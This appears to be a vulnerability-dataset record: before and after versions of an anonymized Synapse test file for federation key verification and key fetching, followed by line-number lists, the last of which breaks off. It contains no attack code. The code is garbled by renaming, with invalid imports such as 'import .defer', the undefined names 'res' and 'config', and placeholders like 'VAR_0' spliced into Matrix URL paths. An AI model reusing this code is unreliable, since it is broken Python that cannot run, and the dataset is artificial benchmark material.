[("server10", VAR_21, 0, "test")]
)
VAR_53[0].addBoth(self.check_context, None)
VAR_25[0] = 1
await make_deferred_yieldable(VAR_53[0])
VAR_25[0] = 2
VAR_26 = ensureDeferred(FUNC_23())
self.pump()
self.assertEqual(VAR_25[0], 1)
VAR_19.get_keys.assert_not_called()
VAR_22.callback(None)
self.get_success(VAR_24)
self.get_success(VAR_26)
def FUNC_8(self):
VAR_4 = keyring.Keyring(self.hs)
VAR_20 = signedjson.key.generate_signing_key(1)
VAR_27 = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", FUNC_0(VAR_20), FetchKeyResult(get_verify_key(VAR_20), 1000))],
)
self.get_success(VAR_27)
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server9", VAR_20)
VAR_28 = FUNC_2(VAR_4, "server9", {}, 0, "test unsigned")
self.get_failure(VAR_28, SynapseError)
VAR_28 = FUNC_2(VAR_4, "server9", VAR_21, 500, "test signed")
self.get_success(VAR_28)
def FUNC_9(self):
VAR_19 = keyring.KeyFetcher()
VAR_19.get_keys = Mock(return_value=make_awaitable({}))
VAR_4 = keyring.Keyring(
self.hs, key_fetchers=(StoreKeyFetcher(self.hs), VAR_19)
)
VAR_20 = signedjson.key.generate_signing_key(1)
VAR_27 = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", FUNC_0(VAR_20), FetchKeyResult(get_verify_key(VAR_20), None))],
)
self.get_success(VAR_27)
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server9", VAR_20)
VAR_28 = FUNC_2(VAR_4, "server9", {}, 0, "test unsigned")
self.get_failure(VAR_28, SynapseError)
VAR_28 = FUNC_2(
VAR_4, "server9", VAR_21, 500, "test signed non-zero min"
)
self.get_failure(VAR_28, SynapseError)
VAR_19.get_keys.assert_called_once_with(
{"server9": {FUNC_0(VAR_20): 500}}
)
VAR_28 = FUNC_2(
VAR_4, "server9", VAR_21, 0, "test signed with zero min"
)
self.get_success(VAR_28)
def FUNC_10(self):
VAR_20 = signedjson.key.generate_signing_key(1)
async def FUNC_24(VAR_23):
self.assertEqual(VAR_23, {"server1": {FUNC_0(VAR_20): 1500}})
return {
"server1": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 1200)
}
}
VAR_19 = keyring.KeyFetcher()
VAR_19.get_keys = Mock(side_effect=FUNC_24)
VAR_4 = keyring.Keyring(self.hs, key_fetchers=(VAR_19,))
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server1", VAR_20)
VAR_29 = VAR_4.verify_json_objects_for_server(
[("server1", VAR_21, 500, "test1"), ("server1", VAR_21, 1500, "test2")]
)
self.assertEqual(len(VAR_29), 2)
self.get_success(VAR_29[0])
VAR_30 = self.get_failure(VAR_29[1], SynapseError).value
self.assertEqual(VAR_30.errcode, "M_UNAUTHORIZED")
self.assertEqual(VAR_30.code, 401)
VAR_19.get_keys.assert_called_once()
def FUNC_11(self):
VAR_20 = signedjson.key.generate_signing_key(1)
async def FUNC_25(VAR_23):
self.assertEqual(VAR_23, {"server1": {FUNC_0(VAR_20): 1500}})
return {
"server1": {FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 800)}
}
async def FUNC_26(VAR_23):
self.assertEqual(VAR_23, {"server1": {FUNC_0(VAR_20): 1500}})
return {
"server1": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 1200)
}
}
VAR_31 = keyring.KeyFetcher()
VAR_31.get_keys = Mock(side_effect=FUNC_25)
VAR_32 = keyring.KeyFetcher()
VAR_32.get_keys = Mock(side_effect=FUNC_26)
VAR_4 = keyring.Keyring(self.hs, key_fetchers=(VAR_31, VAR_32))
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server1", VAR_20)
VAR_29 = VAR_4.verify_json_objects_for_server(
[("server1", VAR_21, 1200, "test1"), ("server1", VAR_21, 1500, "test2")]
)
self.assertEqual(len(VAR_29), 2)
self.get_success(VAR_29[0])
VAR_30 = self.get_failure(VAR_29[1], SynapseError).value
self.assertEqual(VAR_30.errcode, "M_UNAUTHORIZED")
self.assertEqual(VAR_30.code, 401)
VAR_31.get_keys.assert_called_once()
VAR_32.get_keys.assert_called_once()
@logcontext_clean
class CLASS_2(unittest.HomeserverTestCase):
def FUNC_12(self, VAR_10, VAR_11):
self.http_client = Mock()
VAR_33 = self.setup_test_homeserver(http_client=self.http_client)
return VAR_33
def FUNC_13(self):
self.reactor.advance(100)
VAR_34 = "server2"
VAR_35 = ServerKeyFetcher(self.hs)
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
VAR_16 = {
"server_name": VAR_34,
"old_verify_keys": {},
"valid_until_ts": VAR_39,
"verify_keys": {
VAR_38: {
"key": signedjson.key.encode_verify_key_base64(VAR_37)
}
},
}
signedjson.sign.sign_json(VAR_16, VAR_34, VAR_36)
async def FUNC_27(VAR_40, VAR_41, **VAR_3):
self.assertEqual(VAR_40, VAR_34)
self.assertEqual(VAR_41, "/_matrix/VAR_0/v2/server/key1")
return VAR_16
self.http_client.get_json.side_effect = FUNC_27
VAR_23 = {VAR_34: {"key1": 0}}
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.valid_until_ts, VAR_39)
self.assertEqual(VAR_43.verify_key, VAR_37)
self.assertEqual(VAR_43.verify_key.alg, "ed25519")
self.assertEqual(VAR_43.verify_key.version, "ver1")
VAR_44 = (VAR_34, VAR_38, None)
VAR_45 = self.get_success(
self.hs.get_datastore().get_server_keys_json([VAR_44])
)
VAR_7 = VAR_45[VAR_44]
self.assertEqual(len(VAR_7), 1)
VAR_7 = res[0]
self.assertEqual(VAR_7["key_id"], VAR_38)
self.assertEqual(VAR_7["from_server"], VAR_34)
self.assertEqual(VAR_7["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(VAR_7["ts_valid_until_ms"], VAR_39)
self.assertEqual(
bytes(VAR_7["key_json"]), canonicaljson.encode_canonical_json(VAR_16)
)
VAR_16["server_name"] = "OTHER_SERVER"
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
self.assertEqual(VAR_42, {})
class CLASS_3(unittest.HomeserverTestCase):
def FUNC_12(self, VAR_10, VAR_11):
self.mock_perspective_server = CLASS_0()
self.http_client = Mock()
VAR_46 = self.default_config()
VAR_46["trusted_key_servers"] = [
{
"server_name": self.mock_perspective_server.server_name,
"verify_keys": self.mock_perspective_server.get_verify_keys(),
}
]
return self.setup_test_homeserver(http_client=self.http_client, VAR_46=config)
def FUNC_14(
self, VAR_5: str, VAR_12: SigningKey, VAR_13: int,
) -> dict:
VAR_6 = signedjson.key.get_verify_key(VAR_12)
VAR_47 = "%s:%s" % (VAR_6.alg, VAR_6.version)
VAR_16 = {
"server_name": VAR_5,
"old_verify_keys": {},
"valid_until_ts": VAR_13,
"verify_keys": {
VAR_47: {
"key": signedjson.key.encode_verify_key_base64(VAR_6)
}
},
}
signedjson.sign.sign_json(VAR_16, VAR_5, VAR_12)
self.mock_perspective_server.sign_response(VAR_16)
return VAR_16
def FUNC_15(
self, VAR_14: str, VAR_15: str, VAR_16: dict
) -> None:
async def FUNC_28(VAR_40, VAR_41, VAR_48, **VAR_3):
self.assertEqual(VAR_40, self.mock_perspective_server.server_name)
self.assertEqual(VAR_41, "/_matrix/VAR_0/v2/query")
VAR_51 = VAR_48["server_keys"]
self.assertEqual(list(VAR_51[VAR_14].keys()), [VAR_15])
return {"server_keys": [VAR_16]}
self.http_client.post_json.side_effect = FUNC_28
def FUNC_16(self):
self.reactor.advance(100)
VAR_35 = PerspectivesKeyFetcher(self.hs)
VAR_34 = "server2"
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
VAR_16 = self.build_perspectives_response(
VAR_34, VAR_36, VAR_39,
)
self.expect_outgoing_key_query(VAR_34, "key1", VAR_16)
VAR_23 = {VAR_34: {"key1": 0}}
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
self.assertIn(VAR_34, VAR_42)
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.valid_until_ts, VAR_39)
self.assertEqual(VAR_43.verify_key, VAR_37)
self.assertEqual(VAR_43.verify_key.alg, "ed25519")
self.assertEqual(VAR_43.verify_key.version, "ver1")
VAR_44 = (VAR_34, VAR_38, None)
VAR_45 = self.get_success(
self.hs.get_datastore().get_server_keys_json([VAR_44])
)
VAR_7 = VAR_45[VAR_44]
self.assertEqual(len(VAR_7), 1)
VAR_7 = res[0]
self.assertEqual(VAR_7["key_id"], VAR_38)
self.assertEqual(VAR_7["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(VAR_7["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(VAR_7["ts_valid_until_ms"], VAR_39)
self.assertEqual(
bytes(VAR_7["key_json"]), canonicaljson.encode_canonical_json(VAR_16)
)
def FUNC_17(self):
self.reactor.advance(100)
VAR_35 = PerspectivesKeyFetcher(self.hs)
VAR_34 = self.mock_perspective_server.server_name
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
VAR_16 = self.build_perspectives_response(
VAR_34, VAR_36, VAR_39
)
self.expect_outgoing_key_query(VAR_34, "key1", VAR_16)
VAR_23 = {VAR_34: {"key1": 0}}
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
self.assertIn(VAR_34, VAR_42)
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.valid_until_ts, VAR_39)
self.assertEqual(VAR_43.verify_key, VAR_37)
self.assertEqual(VAR_43.verify_key.alg, "ed25519")
self.assertEqual(VAR_43.verify_key.version, "ver1")
VAR_44 = (VAR_34, VAR_38, None)
VAR_45 = self.get_success(
self.hs.get_datastore().get_server_keys_json([VAR_44])
)
VAR_7 = VAR_45[VAR_44]
self.assertEqual(len(VAR_7), 1)
VAR_7 = res[0]
self.assertEqual(VAR_7["key_id"], VAR_38)
self.assertEqual(VAR_7["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(VAR_7["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(VAR_7["ts_valid_until_ms"], VAR_39)
self.assertEqual(
bytes(VAR_7["key_json"]), canonicaljson.encode_canonical_json(VAR_16)
)
def FUNC_18(self):
self.reactor.advance(100)
VAR_34 = "server2"
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
def FUNC_29():
return self.build_perspectives_response(
VAR_34, VAR_36, VAR_39
)
def FUNC_30(VAR_16):
VAR_35 = PerspectivesKeyFetcher(self.hs)
VAR_23 = {VAR_34: {"key1": 0}}
self.expect_outgoing_key_query(VAR_34, "key1", VAR_16)
return self.get_success(VAR_35.get_keys(VAR_23))
VAR_16 = FUNC_29()
VAR_42 = FUNC_30(VAR_16)
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.verify_key, VAR_37)
VAR_16 = FUNC_29()
del VAR_16["signatures"][self.mock_perspective_server.server_name]
VAR_42 = FUNC_30(VAR_16)
self.assertEqual(VAR_42, {}, "Expected empty dict with missing persp server sig")
VAR_16 = FUNC_29()
del VAR_16["signatures"][VAR_34]
VAR_42 = FUNC_30(VAR_16)
self.assertEqual(VAR_42, {}, "Expected empty dict with missing origin server sig")
def FUNC_0(VAR_0):
return "%s:%s" % (VAR_0.alg, VAR_0.version)
@defer.inlineCallbacks
def FUNC_1(VAR_1, *VAR_2, **VAR_3):
with LoggingContext("testctx") as ctx:
ctx.request = "testctx"
VAR_49 = yield VAR_1(*VAR_2, **VAR_3)
return VAR_49
def FUNC_2(VAR_4, *VAR_2):
@defer.inlineCallbacks
def FUNC_19():
VAR_50 = yield VAR_4.verify_json_for_server(*VAR_2)
return VAR_50
return FUNC_1(FUNC_19)
|
import time
from mock import Mock
import canonicaljson
import signedjson.key
import signedjson.sign
from nacl.signing import SigningKey
from signedjson.key import .encode_verify_key_base64, get_verify_key
from twisted.internet import .defer
from twisted.internet.defer import Deferred, ensureDeferred
from synapse.api.errors import SynapseError
from synapse.crypto import .keyring
from synapse.crypto.keyring import (
PerspectivesKeyFetcher,
ServerKeyFetcher,
StoreKeyFetcher,
)
from synapse.logging.context import (
LoggingContext,
current_context,
make_deferred_yieldable,
)
from synapse.storage.keys import FetchKeyResult
from tests import unittest
from tests.test_utils import make_awaitable
from tests.unittest import logcontext_clean
class CLASS_0:
def __init__(self):
self.server_name = "mock_server"
self.key = signedjson.key.generate_signing_key(0)
def FUNC_3(self):
VAR_17 = signedjson.key.get_verify_key(self.key)
return {"%s:%s" % (VAR_17.alg, VAR_17.version): encode_verify_key_base64(VAR_17)}
def FUNC_4(self, VAR_5, VAR_6):
VAR_18 = "%s:%s" % (VAR_6.alg, VAR_6.version)
VAR_7 = {
"server_name": VAR_5,
"old_verify_keys": {},
"valid_until_ts": time.time() * 1000 + 3600,
"verify_keys": {VAR_18: {"key": encode_verify_key_base64(VAR_6)}},
}
self.sign_response(VAR_7)
return VAR_7
def FUNC_5(self, VAR_7):
signedjson.sign.sign_json(VAR_7, self.server_name, self.key)
@logcontext_clean
class CLASS_1(unittest.HomeserverTestCase):
def FUNC_6(self, VAR_8, VAR_9):
self.assertEquals(getattr(current_context(), "request", None), VAR_9)
return VAR_8
def FUNC_7(self):
VAR_19 = keyring.KeyFetcher()
VAR_19.get_keys = Mock()
VAR_4 = keyring.Keyring(self.hs, key_fetchers=(VAR_19,))
VAR_20 = signedjson.key.generate_signing_key(1)
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server10", VAR_20)
VAR_22 = Deferred()
async def FUNC_20(VAR_23):
self.assertEquals(current_context().request, "context_11")
self.assertEqual(VAR_23, {"server10": {FUNC_0(VAR_20): 0}})
await make_deferred_yieldable(VAR_22)
return {
"server10": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 100)
}
}
VAR_19.get_keys.side_effect = FUNC_20
async def FUNC_21():
with LoggingContext("context_11") as context_11:
context_11.request = "context_11"
VAR_52 = VAR_4.verify_json_objects_for_server(
[("server10", VAR_21, 0, "test10"), ("server11", {}, 0, "test11")]
)
self.assertTrue(VAR_52[1].called)
try:
await VAR_52[1]
self.assertFalse("unsigned json didn't cause a failure")
except SynapseError:
pass
self.assertFalse(VAR_52[0].called)
VAR_52[0].addBoth(self.check_context, None)
await make_deferred_yieldable(VAR_52[0])
VAR_24 = ensureDeferred(FUNC_21())
VAR_19.get_keys.assert_called_once()
async def FUNC_22(VAR_23):
self.assertEquals(current_context().request, "context_12")
return {
"server10": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 100)
}
}
VAR_19.get_keys.reset_mock()
VAR_19.get_keys.side_effect = FUNC_22
VAR_25 = [0]
async def FUNC_23():
with LoggingContext("context_12") as context_12:
context_12.request = "context_12"
VAR_53 = VAR_4.verify_json_objects_for_server(
[("server10", VAR_21, 0, "test")]
)
VAR_53[0].addBoth(self.check_context, None)
VAR_25[0] = 1
await make_deferred_yieldable(VAR_53[0])
VAR_25[0] = 2
VAR_26 = ensureDeferred(FUNC_23())
self.pump()
self.assertEqual(VAR_25[0], 1)
VAR_19.get_keys.assert_not_called()
VAR_22.callback(None)
self.get_success(VAR_24)
self.get_success(VAR_26)
def FUNC_8(self):
VAR_4 = keyring.Keyring(self.hs)
VAR_20 = signedjson.key.generate_signing_key(1)
VAR_27 = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", FUNC_0(VAR_20), FetchKeyResult(get_verify_key(VAR_20), 1000))],
)
self.get_success(VAR_27)
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server9", VAR_20)
VAR_28 = FUNC_2(VAR_4, "server9", {}, 0, "test unsigned")
self.get_failure(VAR_28, SynapseError)
VAR_28 = FUNC_2(VAR_4, "server9", VAR_21, 500, "test signed")
self.get_success(VAR_28)
def FUNC_9(self):
VAR_19 = keyring.KeyFetcher()
VAR_19.get_keys = Mock(return_value=make_awaitable({}))
VAR_4 = keyring.Keyring(
self.hs, key_fetchers=(StoreKeyFetcher(self.hs), VAR_19)
)
VAR_20 = signedjson.key.generate_signing_key(1)
VAR_27 = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", FUNC_0(VAR_20), FetchKeyResult(get_verify_key(VAR_20), None))],
)
self.get_success(VAR_27)
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server9", VAR_20)
VAR_28 = FUNC_2(VAR_4, "server9", {}, 0, "test unsigned")
self.get_failure(VAR_28, SynapseError)
VAR_28 = FUNC_2(
VAR_4, "server9", VAR_21, 500, "test signed non-zero min"
)
self.get_failure(VAR_28, SynapseError)
VAR_19.get_keys.assert_called_once_with(
{"server9": {FUNC_0(VAR_20): 500}}
)
VAR_28 = FUNC_2(
VAR_4, "server9", VAR_21, 0, "test signed with zero min"
)
self.get_success(VAR_28)
def FUNC_10(self):
VAR_20 = signedjson.key.generate_signing_key(1)
async def FUNC_24(VAR_23):
self.assertEqual(VAR_23, {"server1": {FUNC_0(VAR_20): 1500}})
return {
"server1": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 1200)
}
}
VAR_19 = keyring.KeyFetcher()
VAR_19.get_keys = Mock(side_effect=FUNC_24)
VAR_4 = keyring.Keyring(self.hs, key_fetchers=(VAR_19,))
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server1", VAR_20)
VAR_29 = VAR_4.verify_json_objects_for_server(
[("server1", VAR_21, 500, "test1"), ("server1", VAR_21, 1500, "test2")]
)
self.assertEqual(len(VAR_29), 2)
self.get_success(VAR_29[0])
VAR_30 = self.get_failure(VAR_29[1], SynapseError).value
self.assertEqual(VAR_30.errcode, "M_UNAUTHORIZED")
self.assertEqual(VAR_30.code, 401)
VAR_19.get_keys.assert_called_once()
def FUNC_11(self):
VAR_20 = signedjson.key.generate_signing_key(1)
async def FUNC_25(VAR_23):
self.assertEqual(VAR_23, {"server1": {FUNC_0(VAR_20): 1500}})
return {
"server1": {FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 800)}
}
async def FUNC_26(VAR_23):
self.assertEqual(VAR_23, {"server1": {FUNC_0(VAR_20): 1500}})
return {
"server1": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 1200)
}
}
VAR_31 = keyring.KeyFetcher()
VAR_31.get_keys = Mock(side_effect=FUNC_25)
VAR_32 = keyring.KeyFetcher()
VAR_32.get_keys = Mock(side_effect=FUNC_26)
VAR_4 = keyring.Keyring(self.hs, key_fetchers=(VAR_31, VAR_32))
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server1", VAR_20)
VAR_29 = VAR_4.verify_json_objects_for_server(
[("server1", VAR_21, 1200, "test1"), ("server1", VAR_21, 1500, "test2")]
)
self.assertEqual(len(VAR_29), 2)
self.get_success(VAR_29[0])
VAR_30 = self.get_failure(VAR_29[1], SynapseError).value
self.assertEqual(VAR_30.errcode, "M_UNAUTHORIZED")
self.assertEqual(VAR_30.code, 401)
VAR_31.get_keys.assert_called_once()
VAR_32.get_keys.assert_called_once()
@logcontext_clean
class CLASS_2(unittest.HomeserverTestCase):
def FUNC_12(self, VAR_10, VAR_11):
self.http_client = Mock()
VAR_33 = self.setup_test_homeserver(federation_http_client=self.http_client)
return VAR_33
def FUNC_13(self):
self.reactor.advance(100)
VAR_34 = "server2"
VAR_35 = ServerKeyFetcher(self.hs)
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
VAR_16 = {
"server_name": VAR_34,
"old_verify_keys": {},
"valid_until_ts": VAR_39,
"verify_keys": {
VAR_38: {
"key": signedjson.key.encode_verify_key_base64(VAR_37)
}
},
}
signedjson.sign.sign_json(VAR_16, VAR_34, VAR_36)
async def FUNC_27(VAR_40, VAR_41, **VAR_3):
self.assertEqual(VAR_40, VAR_34)
self.assertEqual(VAR_41, "/_matrix/VAR_0/v2/server/key1")
return VAR_16
self.http_client.get_json.side_effect = FUNC_27
VAR_23 = {VAR_34: {"key1": 0}}
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.valid_until_ts, VAR_39)
self.assertEqual(VAR_43.verify_key, VAR_37)
self.assertEqual(VAR_43.verify_key.alg, "ed25519")
self.assertEqual(VAR_43.verify_key.version, "ver1")
VAR_44 = (VAR_34, VAR_38, None)
VAR_45 = self.get_success(
self.hs.get_datastore().get_server_keys_json([VAR_44])
)
VAR_7 = VAR_45[VAR_44]
self.assertEqual(len(VAR_7), 1)
VAR_7 = res[0]
self.assertEqual(VAR_7["key_id"], VAR_38)
self.assertEqual(VAR_7["from_server"], VAR_34)
self.assertEqual(VAR_7["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(VAR_7["ts_valid_until_ms"], VAR_39)
self.assertEqual(
bytes(VAR_7["key_json"]), canonicaljson.encode_canonical_json(VAR_16)
)
VAR_16["server_name"] = "OTHER_SERVER"
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
self.assertEqual(VAR_42, {})
class CLASS_3(unittest.HomeserverTestCase):
def FUNC_12(self, VAR_10, VAR_11):
self.mock_perspective_server = CLASS_0()
self.http_client = Mock()
VAR_46 = self.default_config()
VAR_46["trusted_key_servers"] = [
{
"server_name": self.mock_perspective_server.server_name,
"verify_keys": self.mock_perspective_server.get_verify_keys(),
}
]
return self.setup_test_homeserver(
federation_http_client=self.http_client, VAR_46=config
)
def FUNC_14(
self, VAR_5: str, VAR_12: SigningKey, VAR_13: int,
) -> dict:
VAR_6 = signedjson.key.get_verify_key(VAR_12)
VAR_47 = "%s:%s" % (VAR_6.alg, VAR_6.version)
VAR_16 = {
"server_name": VAR_5,
"old_verify_keys": {},
"valid_until_ts": VAR_13,
"verify_keys": {
VAR_47: {
"key": signedjson.key.encode_verify_key_base64(VAR_6)
}
},
}
signedjson.sign.sign_json(VAR_16, VAR_5, VAR_12)
self.mock_perspective_server.sign_response(VAR_16)
return VAR_16
def FUNC_15(
self, VAR_14: str, VAR_15: str, VAR_16: dict
) -> None:
async def FUNC_28(VAR_40, VAR_41, VAR_48, **VAR_3):
self.assertEqual(VAR_40, self.mock_perspective_server.server_name)
self.assertEqual(VAR_41, "/_matrix/VAR_0/v2/query")
VAR_51 = VAR_48["server_keys"]
self.assertEqual(list(VAR_51[VAR_14].keys()), [VAR_15])
return {"server_keys": [VAR_16]}
self.http_client.post_json.side_effect = FUNC_28
def FUNC_16(self):
self.reactor.advance(100)
VAR_35 = PerspectivesKeyFetcher(self.hs)
VAR_34 = "server2"
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
VAR_16 = self.build_perspectives_response(
VAR_34, VAR_36, VAR_39,
)
self.expect_outgoing_key_query(VAR_34, "key1", VAR_16)
VAR_23 = {VAR_34: {"key1": 0}}
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
self.assertIn(VAR_34, VAR_42)
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.valid_until_ts, VAR_39)
self.assertEqual(VAR_43.verify_key, VAR_37)
self.assertEqual(VAR_43.verify_key.alg, "ed25519")
self.assertEqual(VAR_43.verify_key.version, "ver1")
VAR_44 = (VAR_34, VAR_38, None)
VAR_45 = self.get_success(
self.hs.get_datastore().get_server_keys_json([VAR_44])
)
VAR_7 = VAR_45[VAR_44]
self.assertEqual(len(VAR_7), 1)
VAR_7 = res[0]
self.assertEqual(VAR_7["key_id"], VAR_38)
self.assertEqual(VAR_7["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(VAR_7["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(VAR_7["ts_valid_until_ms"], VAR_39)
self.assertEqual(
bytes(VAR_7["key_json"]), canonicaljson.encode_canonical_json(VAR_16)
)
def FUNC_17(self):
self.reactor.advance(100)
VAR_35 = PerspectivesKeyFetcher(self.hs)
VAR_34 = self.mock_perspective_server.server_name
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
VAR_16 = self.build_perspectives_response(
VAR_34, VAR_36, VAR_39
)
self.expect_outgoing_key_query(VAR_34, "key1", VAR_16)
VAR_23 = {VAR_34: {"key1": 0}}
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
self.assertIn(VAR_34, VAR_42)
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.valid_until_ts, VAR_39)
self.assertEqual(VAR_43.verify_key, VAR_37)
self.assertEqual(VAR_43.verify_key.alg, "ed25519")
self.assertEqual(VAR_43.verify_key.version, "ver1")
VAR_44 = (VAR_34, VAR_38, None)
VAR_45 = self.get_success(
self.hs.get_datastore().get_server_keys_json([VAR_44])
)
VAR_7 = VAR_45[VAR_44]
self.assertEqual(len(VAR_7), 1)
VAR_7 = res[0]
self.assertEqual(VAR_7["key_id"], VAR_38)
self.assertEqual(VAR_7["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(VAR_7["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(VAR_7["ts_valid_until_ms"], VAR_39)
self.assertEqual(
bytes(VAR_7["key_json"]), canonicaljson.encode_canonical_json(VAR_16)
)
def FUNC_18(self):
self.reactor.advance(100)
VAR_34 = "server2"
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
def FUNC_29():
return self.build_perspectives_response(
VAR_34, VAR_36, VAR_39
)
def FUNC_30(VAR_16):
VAR_35 = PerspectivesKeyFetcher(self.hs)
VAR_23 = {VAR_34: {"key1": 0}}
self.expect_outgoing_key_query(VAR_34, "key1", VAR_16)
return self.get_success(VAR_35.get_keys(VAR_23))
VAR_16 = FUNC_29()
VAR_42 = FUNC_30(VAR_16)
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.verify_key, VAR_37)
VAR_16 = FUNC_29()
del VAR_16["signatures"][self.mock_perspective_server.server_name]
VAR_42 = FUNC_30(VAR_16)
self.assertEqual(VAR_42, {}, "Expected empty dict with missing persp server sig")
VAR_16 = FUNC_29()
del VAR_16["signatures"][VAR_34]
VAR_42 = FUNC_30(VAR_16)
self.assertEqual(VAR_42, {}, "Expected empty dict with missing origin server sig")
def FUNC_0(VAR_0):
return "%s:%s" % (VAR_0.alg, VAR_0.version)
@defer.inlineCallbacks
def FUNC_1(VAR_1, *VAR_2, **VAR_3):
with LoggingContext("testctx") as ctx:
ctx.request = "testctx"
VAR_49 = yield VAR_1(*VAR_2, **VAR_3)
return VAR_49
def FUNC_2(VAR_4, *VAR_2):
@defer.inlineCallbacks
def FUNC_19():
VAR_50 = yield VAR_4.verify_json_for_server(*VAR_2)
return VAR_50
return FUNC_1(FUNC_19)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
16,
18,
24,
27,
41,
45,
46,
51,
55,
66,
69,
70,
76,
81,
82,
86,
87,
88,
90,
94,
101,
103,
107,
111,
112,
119,
122,
124,
126,
128,
129,
130,
131,
139,
143,
147,
155,
157,
159,
160,
163,
164,
166,
167,
170,
173,
181,
184,
185,
188,
189,
191,
193,
200,
204,
212,
215,
216,
219,
220,
221,
226,
227,
231,
232,
237,
241,
243,
245,
251,
255,
258,
259,
260,
269,
270,
272,
276,
282,
290,
296,
299,
308,
309,
312,
313,
320,
322,
324,
331,
332,
344,
349,
351,
359,
360,
372,
373,
377,
378,
380,
383,
384,
389,
397,
399,
408,
419,
420,
424,
431,
435,
436,
440,
442,
444,
446,
448,
454,
458,
460,
469,
470,
482,
486,
489,
493,
494,
496,
498,
504,
508,
510,
519,
520,
532,
536,
539,
541,
547,
552,
558,
559,
564,
565,
570,
571,
576,
577,
581,
582,
586,
587,
591,
592,
597,
602,
604,
579,
594,
595,
596,
195,
196,
197,
239,
274,
403,
404,
405,
428,
429,
430,
488,
489,
490,
491,
492,
538
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
16,
18,
24,
27,
41,
45,
46,
51,
55,
66,
69,
70,
76,
81,
82,
86,
87,
88,
90,
94,
101,
103,
107,
111,
112,
119,
122,
124,
126,
128,
129,
130,
131,
139,
143,
147,
155,
157,
159,
160,
163,
164,
166,
167,
170,
173,
181,
184,
185,
188,
189,
191,
193,
200,
204,
212,
215,
216,
219,
220,
221,
226,
227,
231,
232,
237,
241,
243,
245,
251,
255,
258,
259,
260,
269,
270,
272,
276,
282,
290,
296,
299,
308,
309,
312,
313,
320,
322,
324,
331,
332,
344,
349,
351,
359,
360,
372,
373,
377,
378,
380,
383,
384,
389,
397,
401,
410,
421,
422,
426,
433,
437,
438,
442,
444,
446,
448,
450,
456,
460,
462,
471,
472,
484,
488,
491,
495,
496,
498,
500,
506,
510,
512,
521,
522,
534,
538,
541,
543,
549,
